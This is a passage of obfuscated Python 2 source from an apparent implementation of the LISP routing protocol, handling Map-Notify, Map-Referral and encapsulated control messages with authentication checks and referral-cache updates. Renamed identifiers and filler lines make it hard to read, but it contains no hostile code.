if 63 - 63: Oo0Ooo . OoO0O00 . OoooooooOO / i1IIi
if 53 - 53: OOooOOo * O0 . iII111i
if 3 - 3: OoooooooOO * I1Ii111 * IiII - OOooOOo * I1Ii111
if 78 - 78: iII111i
if 80 - 80: i1IIi * I1IiiI + OOooOOo
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
IiiiIi1iiii11 = Ii1ii1 . decode ( orig_packet )
if ( IiiiIi1iiii11 == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 91 - 91: I1IiiI % OoOoOO00 * Oo0Ooo / I1ii11iIi11i
if 57 - 57: i11iIiiIii / o0oOOo0O0Ooo . II111iiii
Ii1ii1 . print_notify ( )
if 63 - 63: O0
if 64 - 64: i11iIiiIii / oO0o . oO0o - Oo0Ooo
if 48 - 48: i1IIi + I1ii11iIi11i + I1Ii111 - iII111i
if 3 - 3: i1IIi + OoooooooOO * ooOoO0o + I1Ii111 % OOooOOo / IiII
if 70 - 70: oO0o + i1IIi % o0oOOo0O0Ooo - I11i
OO0o0OO0 = source . print_address ( )
if ( Ii1ii1 . alg_id != 0 or Ii1ii1 . auth_len != 0 ) :
ii1i = None
for o0Oo in lisp_map_servers_list :
if ( o0Oo . find ( OO0o0OO0 ) == - 1 ) : continue
ii1i = lisp_map_servers_list [ o0Oo ]
if 74 - 74: i11iIiiIii
if ( ii1i == None ) :
lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( OO0o0OO0 ) )
if 93 - 93: I1Ii111 % OOooOOo * I1IiiI % iII111i / iIii1I11I1II1 + OoO0O00
return
if 6 - 6: I11i
if 70 - 70: ooOoO0o + OoooooooOO % OoOoOO00 % oO0o / Ii1I . I11i
ii1i . map_notifies_received += 1
if 63 - 63: I1ii11iIi11i - ooOoO0o . OOooOOo / O0 . iIii1I11I1II1 - Ii1I
O0Oo0O000 = lisp_verify_auth ( IiiiIi1iiii11 , Ii1ii1 . alg_id ,
Ii1ii1 . auth_data , ii1i . password )
if 6 - 6: Ii1I
lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if O0Oo0O000 else "failed" ) )
if 60 - 60: iII111i + I1IiiI
if ( O0Oo0O000 == False ) : return
else :
ii1i = lisp_ms ( OO0o0OO0 , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
None )
if 36 - 36: i1IIi . O0 . OoO0O00 % OOooOOo * I11i / Ii1I
if 16 - 16: Oo0Ooo
if 44 - 44: iIii1I11I1II1 - II111iiii . IiII . i1IIi
if 37 - 37: OoooooooOO + Oo0Ooo - Oo0Ooo + I1ii11iIi11i . I1Ii111 / I1IiiI
if 60 - 60: I1IiiI % Ii1I / I1Ii111 + Ii1I
if 43 - 43: I1ii11iIi11i + I11i
ooOoo0o0oO = Ii1ii1 . eid_records
if ( Ii1ii1 . record_count == 0 ) :
lisp_send_map_notify_ack ( lisp_sockets , ooOoo0o0oO , Ii1ii1 , ii1i )
return
if 83 - 83: II111iiii + o0oOOo0O0Ooo - I1Ii111
if 100 - 100: IiII - OoOoOO00 / I11i
if 33 - 33: I1Ii111 * OoOoOO00 . I1ii11iIi11i % I1Ii111
if 87 - 87: Oo0Ooo
if 65 - 65: ooOoO0o . I1IiiI
if 51 - 51: IiII
if 43 - 43: oO0o - I11i . i11iIiiIii
if 78 - 78: i11iIiiIii + Oo0Ooo * Ii1I - o0oOOo0O0Ooo % i11iIiiIii
oO000oOoO0 = lisp_eid_record ( )
IiiiIi1iiii11 = oO000oOoO0 . decode ( ooOoo0o0oO )
if ( IiiiIi1iiii11 == None ) : return
if 30 - 30: I1IiiI % oO0o * OoooooooOO
oO000oOoO0 . print_record ( " " , False )
if 64 - 64: I1IiiI
for oO00000o0OO0 in range ( oO000oOoO0 . rloc_count ) :
oOOo = lisp_rloc_record ( )
IiiiIi1iiii11 = oOOo . decode ( IiiiIi1iiii11 , None )
if ( IiiiIi1iiii11 == None ) :
lprint ( " Could not decode RLOC-record in Map-Notify packet" )
return
if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
oOOo . print_record ( " " )
if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
if 27 - 27: I1IiiI - OOooOOo . II111iiii * I1ii11iIi11i % ooOoO0o / I1IiiI
if 90 - 90: o0oOOo0O0Ooo / I1ii11iIi11i - oO0o - Ii1I - I1IiiI + I1Ii111
if 93 - 93: I1IiiI - I11i . I1IiiI - iIii1I11I1II1
if 1 - 1: O0 . Ii1I % Ii1I + II111iiii . oO0o
if ( oO000oOoO0 . group . is_null ( ) == False ) :
if 24 - 24: o0oOOo0O0Ooo . I1Ii111 % O0
if 67 - 67: I1IiiI * Ii1I
if 64 - 64: OOooOOo
if 90 - 90: iII111i . OoOoOO00 + i1IIi % ooOoO0o * I11i + OoooooooOO
if 2 - 2: o0oOOo0O0Ooo . II111iiii
lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( oO000oOoO0 . print_eid_tuple ( ) , False ) ) )
if 9 - 9: I1Ii111 - II111iiii + OoOoOO00 . OoO0O00
if 33 - 33: Oo0Ooo
oOOO0oo0 = lisp_control_packet_ipc ( orig_packet , OO0o0OO0 , "lisp-itr" , 0 )
lisp_ipc ( oOOO0oo0 , lisp_sockets [ 2 ] , "lisp-core-pkt" )
if 12 - 12: i11iIiiIii . Oo0Ooo / OoOoOO00 + iII111i . Ii1I + ooOoO0o
if 66 - 66: IiII
if 41 - 41: II111iiii + Oo0Ooo / iII111i . IiII / iII111i / I1IiiI
if 78 - 78: o0oOOo0O0Ooo % OoOoOO00 . O0
if 41 - 41: iIii1I11I1II1 . OOooOOo - Oo0Ooo % OOooOOo
lisp_send_map_notify_ack ( lisp_sockets , ooOoo0o0oO , Ii1ii1 , ii1i )
return
if 90 - 90: i11iIiiIii + OoooooooOO - i11iIiiIii + OoooooooOO
if 23 - 23: i11iIiiIii - IiII - I1ii11iIi11i + I1ii11iIi11i % I1IiiI
if 79 - 79: II111iiii / OoooooooOO
if 35 - 35: i1IIi + IiII + II111iiii % OOooOOo
if 25 - 25: I11i + i11iIiiIii + O0 - Ii1I
if 69 - 69: I11i . OoOoOO00 / OOooOOo / i1IIi . II111iiii
if 17 - 17: I1Ii111
if 2 - 2: O0 % OoOoOO00 + oO0o
def lisp_process_map_notify_ack ( packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
packet = Ii1ii1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify-Ack packet" )
return
if 24 - 24: iII111i + iII111i - OoooooooOO % OoooooooOO * O0
if 51 - 51: IiII
Ii1ii1 . print_notify ( )
if 31 - 31: I11i - iIii1I11I1II1 * Ii1I + Ii1I
if 10 - 10: OoOoOO00 - i11iIiiIii % iIii1I11I1II1 / ooOoO0o * i11iIiiIii - Ii1I
if 64 - 64: II111iiii . i11iIiiIii . iII111i . OOooOOo
if 95 - 95: O0 - OoOoOO00
if 68 - 68: ooOoO0o . I1Ii111
if ( Ii1ii1 . record_count < 1 ) :
lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
return
if 84 - 84: OoooooooOO + oO0o % i1IIi + o0oOOo0O0Ooo * i1IIi
if 51 - 51: oO0o . OoooooooOO + OOooOOo * I1ii11iIi11i - ooOoO0o
oO000oOoO0 = lisp_eid_record ( )
if 41 - 41: Oo0Ooo
if ( oO000oOoO0 . decode ( Ii1ii1 . eid_records ) == None ) :
lprint ( "Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack" )
return
if 46 - 46: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii . iII111i
oO000oOoO0 . print_record ( " " , False )
if 66 - 66: oO0o % i1IIi % OoooooooOO
Ii1i1 = oO000oOoO0 . print_eid_tuple ( )
if 58 - 58: OOooOOo
if 89 - 89: iIii1I11I1II1 - i1IIi
if 26 - 26: OOooOOo - iII111i * I1ii11iIi11i / iII111i
if 9 - 9: I1Ii111 / II111iiii * I1Ii111 / I11i - OoO0O00
if ( Ii1ii1 . alg_id != LISP_NONE_ALG_ID and Ii1ii1 . auth_len != 0 ) :
oOOOO0ooo = lisp_sites_by_eid . lookup_cache ( oO000oOoO0 . eid , True )
if ( oOOOO0ooo == None ) :
IIIiiIIiII11 = bold ( "Site not found" , False )
lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( IIIiiIIiII11 , green ( Ii1i1 , False ) ) )
if 36 - 36: IiII . OoOoOO00 . Ii1I
return
if 31 - 31: iIii1I11I1II1
ooo000O0O = oOOOO0ooo . site
if 84 - 84: I1ii11iIi11i - iII111i * I1IiiI
if 88 - 88: OOooOOo / Oo0Ooo
if 31 - 31: II111iiii
if 32 - 32: o0oOOo0O0Ooo % o0oOOo0O0Ooo
ooo000O0O . map_notify_acks_received += 1
if 67 - 67: IiII + oO0o * IiII
o00oO = Ii1ii1 . key_id
if ( ooo000O0O . auth_key . has_key ( o00oO ) ) :
oO0oOOoo0OO0 = ooo000O0O . auth_key [ o00oO ]
else :
oO0oOOoo0OO0 = ""
if 26 - 26: I1ii11iIi11i + i1IIi . i1IIi - oO0o + I1IiiI * o0oOOo0O0Ooo
if 62 - 62: ooOoO0o + ooOoO0o % I11i
O0Oo0O000 = lisp_verify_auth ( packet , Ii1ii1 . alg_id ,
Ii1ii1 . auth_data , oO0oOOoo0OO0 )
if 100 - 100: II111iiii . OoooooooOO
o00oO = "key-id {}" . format ( o00oO ) if o00oO == Ii1ii1 . key_id else "bad key-id {}" . format ( Ii1ii1 . key_id )
if 32 - 32: I11i % OOooOOo * O0 / iIii1I11I1II1 / i1IIi
if 87 - 87: OoO0O00 . I1ii11iIi11i * I1IiiI
lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if O0Oo0O000 else "failed" , o00oO ) )
if 83 - 83: OOooOOo
if ( O0Oo0O000 == False ) : return
if 86 - 86: I1Ii111 / oO0o
if 67 - 67: OoOoOO00 + Oo0Ooo / i11iIiiIii . I1IiiI
if 53 - 53: Oo0Ooo + IiII * ooOoO0o % OoooooooOO * oO0o . iII111i
if 78 - 78: O0 . Ii1I - I1ii11iIi11i
if 69 - 69: O0 % O0 . oO0o * OoooooooOO
if ( Ii1ii1 . retransmit_timer ) : Ii1ii1 . retransmit_timer . cancel ( )
if 13 - 13: i1IIi % oO0o . OoooooooOO + I1ii11iIi11i - OOooOOo
oo00 = source . print_address ( )
o0Oo = Ii1ii1 . nonce_key
if 99 - 99: OoooooooOO % OOooOOo / I11i
if ( lisp_map_notify_queue . has_key ( o0Oo ) ) :
Ii1ii1 = lisp_map_notify_queue . pop ( o0Oo )
if ( Ii1ii1 . retransmit_timer ) : Ii1ii1 . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( o0Oo ) )
if 77 - 77: II111iiii - IiII % OOooOOo
else :
lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( Ii1ii1 . nonce_key , red ( oo00 , False ) ) )
if 22 - 22: OoooooooOO / oO0o
if 78 - 78: oO0o * I11i . i1IIi % i1IIi + i1IIi / OOooOOo
return
if 66 - 66: OoooooooOO % o0oOOo0O0Ooo / I11i * I1Ii111
if 12 - 12: I1Ii111
if 17 - 17: I1Ii111 % oO0o + O0
if 15 - 15: o0oOOo0O0Ooo - OoooooooOO % ooOoO0o % oO0o / i11iIiiIii / Oo0Ooo
if 59 - 59: iII111i + O0 - I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 . O0 - ooOoO0o / OoOoOO00 % iIii1I11I1II1 + IiII
if 23 - 23: OoOoOO00 + ooOoO0o . i11iIiiIii
if 39 - 39: OoOoOO00 - I1ii11iIi11i / I1Ii111
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
if ( action not in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) : return ( False )
if 48 - 48: IiII - oO0o + I11i % o0oOOo0O0Ooo
if ( mr . last_cached_prefix [ 0 ] == None ) : return ( False )
if 81 - 81: Oo0Ooo . I1Ii111 * iIii1I11I1II1
if 60 - 60: OoooooooOO
if 41 - 41: iIii1I11I1II1 + O0 % o0oOOo0O0Ooo - IiII . I11i * O0
if 39 - 39: i11iIiiIii . Ii1I
I1II1i = False
if ( group . is_null ( ) == False ) :
I1II1i = mr . last_cached_prefix [ 1 ] . is_more_specific ( group )
if 68 - 68: OOooOOo * ooOoO0o . I1IiiI - iII111i
if ( I1II1i == False ) :
I1II1i = mr . last_cached_prefix [ 0 ] . is_more_specific ( eid )
if 81 - 81: I11i % Oo0Ooo / iII111i
if 44 - 44: Oo0Ooo
if ( I1II1i ) :
iIIiIIiII111 = lisp_print_eid_tuple ( eid , group )
OOI1i1I1iI11iI1 = lisp_print_eid_tuple ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] )
if 39 - 39: I1ii11iIi11i - Oo0Ooo / Ii1I
lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( iIIiIIiII111 , False ) , s ,
# II111iiii % OOooOOo % Ii1I + ooOoO0o / oO0o + o0oOOo0O0Ooo
OOI1i1I1iI11iI1 ) )
if 38 - 38: iII111i . ooOoO0o
return ( I1II1i )
if 93 - 93: oO0o
if 30 - 30: OoOoOO00 - O0 * iIii1I11I1II1 + I1IiiI + IiII
if 57 - 57: O0 * I11i % OOooOOo
if 28 - 28: I1IiiI . OOooOOo
if 27 - 27: ooOoO0o + o0oOOo0O0Ooo . i11iIiiIii * i1IIi % I11i - IiII
if 99 - 99: OoO0O00 * oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
if 39 - 39: OoO0O00 + II111iiii
iIi11iI = lisp_map_referral ( )
packet = iIi11iI . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Referral packet" )
return
if 98 - 98: O0 - I1Ii111 % oO0o - iII111i + Ii1I * i1IIi
iIi11iI . print_map_referral ( )
if 76 - 76: o0oOOo0O0Ooo
OO0o0OO0 = source . print_address ( )
o0OOO = iIi11iI . nonce
if 55 - 55: OOooOOo + I1ii11iIi11i * Oo0Ooo
if 11 - 11: i1IIi - OoooooooOO * OoOoOO00 / oO0o - OoooooooOO - I1IiiI
if 22 - 22: i11iIiiIii . Ii1I . Oo0Ooo * Oo0Ooo - iII111i / I1ii11iIi11i
if 49 - 49: iII111i + I11i . Oo0Ooo
for iIi1I1 in range ( iIi11iI . record_count ) :
oO000oOoO0 = lisp_eid_record ( )
packet = oO000oOoO0 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Referral packet" )
return
if 23 - 23: I1IiiI . Ii1I + ooOoO0o . OoooooooOO
oO000oOoO0 . print_record ( " " , True )
if 57 - 57: OOooOOo / OoOoOO00 / i11iIiiIii - I11i - I11i . Ii1I
if 53 - 53: ooOoO0o . iII111i + Ii1I * I1Ii111
if 49 - 49: II111iiii . I1ii11iIi11i * OoOoOO00 - OOooOOo
if 48 - 48: OoO0O00 . iIii1I11I1II1 - OoooooooOO + I1Ii111 / i11iIiiIii . Oo0Ooo
o0Oo = str ( o0OOO )
if ( o0Oo not in lisp_ddt_map_requestQ ) :
lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( o0OOO ) , OO0o0OO0 ) )
if 61 - 61: II111iiii + OOooOOo . o0oOOo0O0Ooo . iIii1I11I1II1
if 63 - 63: I11i + i11iIiiIii . o0oOOo0O0Ooo . i1IIi + OoOoOO00
continue
if 1 - 1: i11iIiiIii
oOO00O0oooo00 = lisp_ddt_map_requestQ [ o0Oo ]
if ( oOO00O0oooo00 == None ) :
lprint ( ( "No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( o0OOO ) , OO0o0OO0 ) )
if 1 - 1: iIii1I11I1II1
continue
if 73 - 73: iII111i + IiII
if 95 - 95: O0
if 75 - 75: ooOoO0o
if 8 - 8: O0 - OoooooooOO + I1ii11iIi11i / Oo0Ooo . oO0o + I1Ii111
if 85 - 85: ooOoO0o
if 29 - 29: iII111i . Ii1I
if ( lisp_map_referral_loop ( oOO00O0oooo00 , oO000oOoO0 . eid , oO000oOoO0 . group ,
oO000oOoO0 . action , OO0o0OO0 ) ) :
oOO00O0oooo00 . dequeue_map_request ( )
continue
if 43 - 43: I11i - I1ii11iIi11i + iIii1I11I1II1 / I1ii11iIi11i * oO0o / iIii1I11I1II1
if 45 - 45: IiII
oOO00O0oooo00 . last_cached_prefix [ 0 ] = oO000oOoO0 . eid
oOO00O0oooo00 . last_cached_prefix [ 1 ] = oO000oOoO0 . group
if 49 - 49: I1IiiI . Ii1I * I1IiiI - OoooooooOO . I11i / I1Ii111
if 9 - 9: iIii1I11I1II1 * Ii1I / O0 - OOooOOo
if 95 - 95: i11iIiiIii * II111iiii * OOooOOo * iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 / I1IiiI + OoOoOO00 - OOooOOo . i11iIiiIii / i11iIiiIii
iI1I11II = False
IiiiiII1i = lisp_referral_cache_lookup ( oO000oOoO0 . eid , oO000oOoO0 . group ,
True )
if ( IiiiiII1i == None ) :
iI1I11II = True
IiiiiII1i = lisp_referral ( )
IiiiiII1i . eid = oO000oOoO0 . eid
IiiiiII1i . group = oO000oOoO0 . group
if ( oO000oOoO0 . ddt_incomplete == False ) : IiiiiII1i . add_cache ( )
elif ( IiiiiII1i . referral_source . not_set ( ) ) :
lprint ( "Do not replace static referral entry {}" . format ( green ( IiiiiII1i . print_eid_tuple ( ) , False ) ) )
if 10 - 10: iIii1I11I1II1 % i1IIi
oOO00O0oooo00 . dequeue_map_request ( )
continue
if 78 - 78: I11i + II111iiii % o0oOOo0O0Ooo
if 17 - 17: i11iIiiIii + oO0o * iII111i . II111iiii
iI1IIi1I = oO000oOoO0 . action
IiiiiII1i . referral_source = source
IiiiiII1i . referral_type = iI1IIi1I
Oo0o0 = oO000oOoO0 . store_ttl ( )
IiiiiII1i . referral_ttl = Oo0o0
IiiiiII1i . expires = lisp_set_timestamp ( Oo0o0 )
if 44 - 44: I1ii11iIi11i
if 39 - 39: iII111i + Oo0Ooo / oO0o
if 95 - 95: I1Ii111 * oO0o / ooOoO0o . Ii1I . OoOoOO00
if 99 - 99: I1IiiI * II111iiii
oooOO0o0 = IiiiiII1i . is_referral_negative ( )
if ( IiiiiII1i . referral_set . has_key ( OO0o0OO0 ) ) :
iiI111I = IiiiiII1i . referral_set [ OO0o0OO0 ]
if 91 - 91: II111iiii + I11i + i1IIi
if ( iiI111I . updown == False and oooOO0o0 == False ) :
iiI111I . updown = True
lprint ( "Change up/down status for referral-node {} to up" . format ( OO0o0OO0 ) )
if 85 - 85: Ii1I * Ii1I . OoOoOO00 / Oo0Ooo
elif ( iiI111I . updown == True and oooOO0o0 == True ) :
iiI111I . updown = False
lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( OO0o0OO0 ) )
if 97 - 97: oO0o % iIii1I11I1II1
if 87 - 87: II111iiii % I1IiiI + oO0o - I11i / I11i
if 16 - 16: I1IiiI
if 39 - 39: ooOoO0o * II111iiii
if 90 - 90: OoooooooOO * ooOoO0o
if 14 - 14: I1IiiI % i1IIi
if 35 - 35: ooOoO0o % o0oOOo0O0Ooo % ooOoO0o
if 77 - 77: OOooOOo % I1Ii111 / i11iIiiIii . i1IIi % OOooOOo
oOOoOOo00oo0OO = { }
for o0Oo in IiiiiII1i . referral_set : oOOoOOo00oo0OO [ o0Oo ] = None
if 84 - 84: oO0o + OoooooooOO
if 8 - 8: I11i + i11iIiiIii + Ii1I
if 38 - 38: oO0o + IiII . oO0o % iIii1I11I1II1 % Oo0Ooo * i11iIiiIii
if 94 - 94: i11iIiiIii . II111iiii - i11iIiiIii / OoOoOO00
for iIi1I1 in range ( oO000oOoO0 . rloc_count ) :
oOOo = lisp_rloc_record ( )
packet = oOOo . decode ( packet , None )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Referral packet" )
return
if 23 - 23: I1IiiI % iIii1I11I1II1 - oO0o - iII111i - o0oOOo0O0Ooo
oOOo . print_record ( " " )
if 39 - 39: Oo0Ooo . OoO0O00
if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
if 100 - 100: ooOoO0o / OoooooooOO
if 73 - 73: i11iIiiIii - Oo0Ooo
oo0o00OO = oOOo . rloc . print_address ( )
if ( IiiiiII1i . referral_set . has_key ( oo0o00OO ) == False ) :
iiI111I = lisp_referral_node ( )
iiI111I . referral_address . copy_address ( oOOo . rloc )
IiiiiII1i . referral_set [ oo0o00OO ] = iiI111I
if ( OO0o0OO0 == oo0o00OO and oooOO0o0 ) : iiI111I . updown = False
else :
iiI111I = IiiiiII1i . referral_set [ oo0o00OO ]
if ( oOOoOOo00oo0OO . has_key ( oo0o00OO ) ) : oOOoOOo00oo0OO . pop ( oo0o00OO )
if 100 - 100: iIii1I11I1II1 + I1Ii111
iiI111I . priority = oOOo . priority
iiI111I . weight = oOOo . weight
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
if 84 - 84: Oo0Ooo * OoOoOO00 / Ii1I / IiII / o0oOOo0O0Ooo . I1ii11iIi11i
if 81 - 81: I1IiiI
if 82 - 82: I1Ii111 - OoooooooOO - Ii1I
for o0Oo in oOOoOOo00oo0OO : IiiiiII1i . referral_set . pop ( o0Oo )
if 34 - 34: OOooOOo . iIii1I11I1II1 / I1IiiI . Oo0Ooo - iIii1I11I1II1
Ii1i1 = IiiiiII1i . print_eid_tuple ( )
if 83 - 83: iII111i - I1ii11iIi11i + iII111i
if ( iI1I11II ) :
if ( oO000oOoO0 . ddt_incomplete ) :
lprint ( "Suppress add {} to referral-cache" . format ( green ( Ii1i1 , False ) ) )
if 4 - 4: o0oOOo0O0Ooo % iIii1I11I1II1 + I11i
else :
lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( Ii1i1 , False ) , oO000oOoO0 . rloc_count ) )
if 60 - 60: I1ii11iIi11i / I1Ii111 % i11iIiiIii % oO0o % I1IiiI . Oo0Ooo
if 20 - 20: IiII - OOooOOo + OoOoOO00
else :
lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( Ii1i1 , False ) , oO000oOoO0 . rloc_count ) )
if 83 - 83: OoooooooOO / I1IiiI + iII111i - iIii1I11I1II1 % ooOoO0o
if 74 - 74: OoO0O00
if 13 - 13: I1ii11iIi11i / OoO0O00
if 90 - 90: iIii1I11I1II1 - OoO0O00 . i1IIi / o0oOOo0O0Ooo + O0
if 94 - 94: IiII * i1IIi
if 90 - 90: O0 % I1IiiI . o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if ( iI1IIi1I == LISP_DDT_ACTION_DELEGATION_HOLE ) :
lisp_send_negative_map_reply ( oOO00O0oooo00 . lisp_sockets , IiiiiII1i . eid ,
IiiiiII1i . group , oOO00O0oooo00 . nonce , oOO00O0oooo00 . itr , oOO00O0oooo00 . sport , 15 , None , False )
oOO00O0oooo00 . dequeue_map_request ( )
if 16 - 16: OoO0O00 / OOooOOo / iIii1I11I1II1 / OoooooooOO . oO0o - I1Ii111
if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if ( iI1IIi1I == LISP_DDT_ACTION_NOT_AUTH ) :
if ( oOO00O0oooo00 . tried_root ) :
lisp_send_negative_map_reply ( oOO00O0oooo00 . lisp_sockets , IiiiiII1i . eid ,
IiiiiII1i . group , oOO00O0oooo00 . nonce , oOO00O0oooo00 . itr , oOO00O0oooo00 . sport , 0 , None , False )
oOO00O0oooo00 . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( oOO00O0oooo00 , True )
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
if 4 - 4: iIii1I11I1II1 - iIii1I11I1II1 * I11i
if 32 - 32: I1IiiI + II111iiii * iII111i + O0 / O0 * Oo0Ooo
if ( iI1IIi1I == LISP_DDT_ACTION_MS_NOT_REG ) :
if ( IiiiiII1i . referral_set . has_key ( OO0o0OO0 ) ) :
iiI111I = IiiiiII1i . referral_set [ OO0o0OO0 ]
iiI111I . updown = False
if 64 - 64: i11iIiiIii / iII111i + i11iIiiIii . I11i
if ( len ( IiiiiII1i . referral_set ) == 0 ) :
oOO00O0oooo00 . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( oOO00O0oooo00 , False )
if 66 - 66: i1IIi
if 98 - 98: Oo0Ooo / iIii1I11I1II1
if 33 - 33: O0 - iII111i
if ( iI1IIi1I in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) :
if ( oOO00O0oooo00 . eid . is_exact_match ( oO000oOoO0 . eid ) ) :
if ( not oOO00O0oooo00 . tried_root ) :
lisp_send_ddt_map_request ( oOO00O0oooo00 , True )
else :
lisp_send_negative_map_reply ( oOO00O0oooo00 . lisp_sockets ,
IiiiiII1i . eid , IiiiiII1i . group , oOO00O0oooo00 . nonce , oOO00O0oooo00 . itr ,
oOO00O0oooo00 . sport , 15 , None , False )
oOO00O0oooo00 . dequeue_map_request ( )
if 40 - 40: iII111i * I11i
else :
lisp_send_ddt_map_request ( oOO00O0oooo00 , False )
if 25 - 25: O0 * o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 87 - 87: OoOoOO00
if 30 - 30: IiII % OoOoOO00 + I1Ii111
if ( iI1IIi1I == LISP_DDT_ACTION_MS_ACK ) : oOO00O0oooo00 . dequeue_map_request ( )
if 13 - 13: iII111i * Ii1I % o0oOOo0O0Ooo * i1IIi . IiII % i1IIi
return
if 79 - 79: OoooooooOO % I11i / o0oOOo0O0Ooo + IiII + O0 + iII111i
if 87 - 87: I11i
if 39 - 39: I1ii11iIi11i * i11iIiiIii % I1Ii111
if 72 - 72: OoO0O00 * Oo0Ooo - IiII
if 74 - 74: Ii1I
if 26 - 26: I11i . O0
if 68 - 68: Ii1I
if 26 - 26: o0oOOo0O0Ooo - I1ii11iIi11i / O0 % i11iIiiIii
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
I1i1ii = lisp_ecm ( 0 )
packet = I1i1ii . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode ECM packet" )
return
if 7 - 7: I1Ii111 . Oo0Ooo + IiII / iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 - O0 . iII111i - IiII - ooOoO0o
I1i1ii . print_ecm ( )
if 54 - 54: OoO0O00 . iII111i . OoOoOO00 * OoO0O00 + o0oOOo0O0Ooo . ooOoO0o
O00O0OO = lisp_control_header ( )
if ( O00O0OO . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return
if 44 - 44: I11i * iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: o0oOOo0O0Ooo
I1II1i1ii11I = O00O0OO . type
del ( O00O0OO )
if 29 - 29: iIii1I11I1II1 / ooOoO0o
if ( I1II1i1ii11I != LISP_MAP_REQUEST ) :
lprint ( "Received ECM without Map-Request inside" )
return
if 75 - 75: OoooooooOO + I1IiiI % OoOoOO00 / O0 - IiII
if 88 - 88: OoO0O00 % Ii1I
if 12 - 12: OoooooooOO . O0
if 33 - 33: OoooooooOO / I11i . II111iiii * i1IIi
if 34 - 34: i11iIiiIii / OoOoOO00
oOoo0Oo0O = I1i1ii . udp_sport
II1IIII = time . time ( )
lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
I1i1ii . source , oOoo0Oo0O , I1i1ii . ddt , - 1 , II1IIII )
return
if 12 - 12: OoOoOO00 * I1ii11iIi11i - Ii1I / I1Ii111 * I1Ii111 - ooOoO0o
if 28 - 28: Ii1I
if 6 - 6: i1IIi + Oo0Ooo % I11i . OOooOOo + oO0o
if 92 - 92: OoOoOO00 / OoOoOO00 / i1IIi + I1IiiI . i1IIi
if 81 - 81: Ii1I * IiII / OoO0O00 . iII111i % I11i . ooOoO0o
if 63 - 63: Oo0Ooo * I1Ii111 % Ii1I
if 88 - 88: IiII - i1IIi * OoO0O00 * OoOoOO00 % I1IiiI
if 10 - 10: OOooOOo * I1ii11iIi11i / I11i * o0oOOo0O0Ooo % O0 * i11iIiiIii
if 68 - 68: I11i . Ii1I + I11i / IiII . I11i / iIii1I11I1II1
if 96 - 96: O0
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
if 2 - 2: OoO0O00 / iII111i + o0oOOo0O0Ooo
if 27 - 27: I11i - OoOoOO00 - ooOoO0o - I1IiiI
if 51 - 51: I11i + I11i + O0 + O0 * I1Ii111
if 61 - 61: IiII . O0
if 38 - 38: Ii1I * I1ii11iIi11i - i11iIiiIii + ooOoO0o * I11i
if 74 - 74: OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: ooOoO0o + I1ii11iIi11i * i11iIiiIii / i1IIi
Ii1II1I11i1I = ms . map_server
if ( lisp_decent_push_configured and Ii1II1I11i1I . is_multicast_address ( ) and
( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
Ii1II1I11i1I = copy . deepcopy ( Ii1II1I11i1I )
Ii1II1I11i1I . address = 0x7f000001
OOoo0 = bold ( "Bootstrap" , False )
i11ii = ms . map_server . print_address_no_iid ( )
lprint ( "{} mapping system for peer-group {}" . format ( OOoo0 , i11ii ) )
if 95 - 95: oO0o / IiII * II111iiii * Ii1I . OoO0O00 . OoO0O00
